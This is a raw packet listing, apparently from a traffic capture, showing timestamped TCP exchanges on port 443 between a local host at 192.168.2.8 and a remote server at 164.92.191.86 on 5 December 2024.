                                                                                                                                                                                                Dec 5, 2024 08:24:43.547281981 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:43.547703028 CET49759443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:43.547713041 CET44349759164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.283618927 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.283979893 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.284013033 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.285079002 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.285135031 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.286196947 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.286267996 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.286416054 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.286428928 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.333287001 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.924690962 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.924825907 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.925158024 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.925167084 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.925287962 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.925307989 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.926246881 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.926343918 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.926362991 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.926398993 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927331924 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927406073 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927407980 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927484035 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927618027 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927624941 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927685976 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.927692890 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.928173065 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.928389072 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.928395987 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.929436922 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.929589033 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.929780960 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.929847956 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.929944038 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.930272102 CET44349759164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.930430889 CET49759443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.930448055 CET44349759164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.931713104 CET44349759164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.931763887 CET49759443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.932075024 CET49759443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.932171106 CET44349759164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.974220037 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.974220037 CET49759443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.974220991 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.974220991 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:44.974234104 CET44349759164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:44.974235058 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:45.020298958 CET49759443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.020298958 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.176282883 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:45.176616907 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.176632881 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:45.176647902 CET44349752164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:45.176698923 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.176728964 CET49752443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.177359104 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.177411079 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:45.177486897 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.177723885 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:45.177742004 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.041846037 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.041868925 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.041876078 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.041923046 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.041946888 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.041979074 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.041987896 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.042054892 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.053757906 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.053833008 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.053843975 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.053872108 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141563892 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141590118 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141597986 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141630888 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141649008 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141659021 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141659975 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141674042 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141725063 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141727924 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.141768932 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.211992979 CET49758443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.212006092 CET44349758164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.212441921 CET49756443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.212462902 CET44349756164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.377126932 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.377166033 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.377258062 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.377477884 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.377491951 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.454292059 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.454320908 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.454500914 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.454705954 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.454722881 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514645100 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514668941 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514677048 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514710903 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514725924 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514734983 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514743090 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.514779091 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.556936979 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.557209969 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.557219028 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.557552099 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.557882071 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.557940960 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.558015108 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.558275938 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.558315039 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.558341026 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.558347940 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.558388948 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.599330902 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.601795912 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.601818085 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.601856947 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.601866961 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.601891041 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.610619068 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.657582998 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.729921103 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.729935884 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.729971886 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.729999065 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.730001926 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.730021954 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.730051994 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.730067015 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.760118008 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.760143995 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.760191917 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.760204077 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.760227919 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.760247946 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.764302969 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.764360905 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.828413010 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.828448057 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.828495979 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.828511953 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.828543901 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.828562021 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.913439989 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.913485050 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.913517952 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.913527012 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.913557053 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.913570881 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.922996998 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.923088074 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.923094988 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.923151016 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.930052042 CET49757443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.930075884 CET44349757164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.964302063 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.964348078 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:46.964524031 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.965709925 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:46.965725899 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.010782957 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.010814905 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.010946035 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.011244059 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.011255980 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.083143950 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.083156109 CET44349775164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.083218098 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.083775997 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.083790064 CET44349775164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.273917913 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.273953915 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.274020910 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.274291992 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.274303913 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.482374907 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.482465029 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.482657909 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.482811928 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.482839108 CET44349765164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.482856989 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.482969999 CET49765443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.756545067 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.756771088 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.756804943 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.757814884 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.757889986 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.758846045 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.758922100 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.759090900 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.759113073 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.811796904 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.834548950 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.834816933 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.834846020 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.835855007 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.835916042 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.836599112 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.836662054 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.836760044 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.877888918 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:47.877907991 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:47.929162025 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.345073938 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.346122980 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.346138000 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.346487999 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.348746061 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.348812103 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.349574089 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.391132116 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.391504049 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.391513109 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.392575979 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.392663002 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.394311905 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.394366980 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.394612074 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.394619942 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.395333052 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.446260929 CET49774443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.466325998 CET44349775164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.466698885 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.466715097 CET44349775164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.467797041 CET44349775164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.467866898 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.468472958 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.468555927 CET44349775164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.468734980 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.468743086 CET44349775164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.523649931 CET49775443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.657799006 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.701980114 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.768691063 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.768717051 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.769958973 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.770014048 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.776526928 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.776560068 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.776618958 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.776627064 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.776667118 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.795701027 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.795847893 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.796354055 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.812597036 CET49766443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.812617064 CET44349766164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.839337111 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.845192909 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.845222950 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.891191006 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949342012 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949368954 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949376106 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949399948 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949409962 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949420929 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949484110 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949529886 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949544907 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.949580908 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.953361034 CET49767443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:48.953385115 CET44349767164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.264358044 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.264672041 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.264748096 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:49.264962912 CET49773443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:49.264978886 CET44349773164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.583647966 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.583776951 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.583947897 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:49.584285975 CET49776443192.168.2.8164.92.191.86
                                                                                                                                                                                                Dec 5, 2024 08:24:49.584307909 CET44349776164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.814620972 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.814651966 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.814661026 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.814680099 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.814692020 CET44349774164.92.191.86192.168.2.8
                                                                                                                                                                                                Dec 5, 2024 08:24:49.814702988 CET44349774164.92.191.86192.168.2.8
